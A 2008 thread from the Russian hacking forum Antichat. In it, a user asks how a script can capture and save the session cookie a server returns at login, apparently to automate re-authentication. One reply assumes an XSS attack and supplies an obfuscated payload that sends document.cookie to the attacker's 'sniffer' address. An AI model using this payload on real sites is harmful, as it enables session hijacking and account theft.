Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Снова о куке!!! При авторизации сервер ее дает, как сохр... (https://forum.antichat.xyz/showthread.php?t=76218)

rcc0023 06.07.2008 15:10

Снова о куке!!! При авторизации сервер ее дает, как сохр...
 
Снова вопрос о куке!
Есть сервер X, при авторизации он передает куку... так вот, какой скрипт может перехватить переданную им (сервером X) куку??

Ильич 06.07.2008 15:12

никакой

Kusto 06.07.2008 15:27

блин все так туманно расписанно- непойму ты XSS нашел а как ей воспользоваться незнаеш? я правильно понял?, ну для начала тебе снифер нужен ну а потом попробуй вставить что то наподобие (script)img=new Image();img.src="адрес твоего снифера"+document.cookie;(/script)
P.S. единственное замени ) на > ну и обратную скобку на < в словах script

rcc0023 06.07.2008 15:42

Да не)))

Я написал скрипт (назовем его My_script), который передает пост запрос с обязательной кукой, в которой содержится сессия. Эта сессия на 2 часа, далее идет логаут... сессия уже не действительна. Необходимо снова логинится и забивать в скрипт My_script данные куки... я хочу чтобы новую куку брал скрипт...

rcc0023 06.07.2008 15:46

post запрос с логин\паролем скрипту www.chuzoy_site.py/LOGIN.PHP ... он дает ответ, в котором кука... нужно ее сохранить

-Hormold- 06.07.2008 16:01

используй /dev/head/
в гугле поищи...
хорошая вещь...

rcc0023 06.07.2008 16:16

Мм... -Hormold-, я не профи)) подробней бы ;)
и у мну нет никса... одни окна... (на домашнем хочу..)

Ильич 06.07.2008 16:19

Цитата:

используй /dev/head/
Цитата:

и у мну нет никса...
:D :D :D

rcc0023 06.07.2008 16:45

Ну так как?? Опять будете до последнего молчать??!?!?

rcc0023 07.07.2008 01:52

Ну ответьте.. какой скрипт это может проделать?


Время: 03:34